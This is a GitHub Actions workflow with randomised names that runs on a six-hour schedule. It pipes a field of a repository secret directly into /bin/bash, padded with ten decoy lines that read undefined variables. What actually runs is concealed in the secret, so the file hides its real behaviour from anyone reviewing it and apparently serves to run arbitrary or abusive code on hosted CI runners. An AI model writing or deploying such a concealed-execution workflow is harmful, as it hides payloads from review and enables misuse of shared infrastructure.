name: donghuixingmei
on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'

jobs:  # 10571
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: donghuixingmei
        env:
          kt72: ${{ secrets.kt72 }}
        run: |
          echo $kt72 | jq -r .leher93564 | /bin/bash
          echo $zpeqw6 | jq -r .t1 | /bin/bash
          echo $do479 | jq -r .ukkb31 | /bin/bash
          echo $x1 | jq -r .l8791 | /bin/bash
          echo $eazgx9 | jq -r .bbu4033 | /bin/bash
          echo $nh4958 | jq -r .imube037 | /bin/bash
          echo $af2 | jq -r .zhe5 | /bin/bash
          echo $tzk4 | jq -r .uytd6 | /bin/bash
          echo $oosh9434 | jq -r .nmr79 | /bin/bash
          echo $gke41352 | jq -r .dyw31036 | /bin/bash
          echo $xmzuz958 | jq -r .qjcy3790 | /bin/bash

